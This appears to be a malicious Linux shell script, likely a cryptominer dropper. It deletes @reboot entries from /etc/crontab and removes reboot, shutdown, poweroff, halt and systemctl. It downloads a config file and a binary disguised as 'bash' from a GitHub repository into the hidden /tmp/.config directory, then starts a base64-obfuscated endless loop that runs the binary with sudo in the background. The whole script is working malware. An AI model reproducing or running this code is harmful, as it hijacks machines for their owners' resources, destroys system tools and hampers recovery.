#!/bin/bash

sudo sed -i '/^@reboot/d' /etc/crontab
sudo rm -rf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl

name=`TZ=":Asia/Shanghai" date '+%Y%m%d'`
[ -n "$name" ] || name="NULL"

mkdir -p /tmp/.config
wget -qO /tmp/.config/config.json https://raw.githubusercontent.com/vjbahkds/cajbdfv/main/z.json
wget -qO /tmp/.config/bash https://raw.githubusercontent.com/vjbahkds/cajbdfv/main/bash
chmod -R 777 /tmp/.config
[ -f /tmp/.config/config.json ] && sed -i "s/\"pass\":.*,/\"pass\": \"${name}\",/g" /tmp/.config/config.json
/bin/sh -c "echo 'd2hpbGUgdHJ1ZTsgZG8gY2QgL3RtcC8uY29uZmlnICYmIG5vaHVwIHN1ZG8gLi9iYXNoID4vZGV2L251bGwgMj4mMSA7IGRvbmUK' |base64 -d |/bin/bash" &

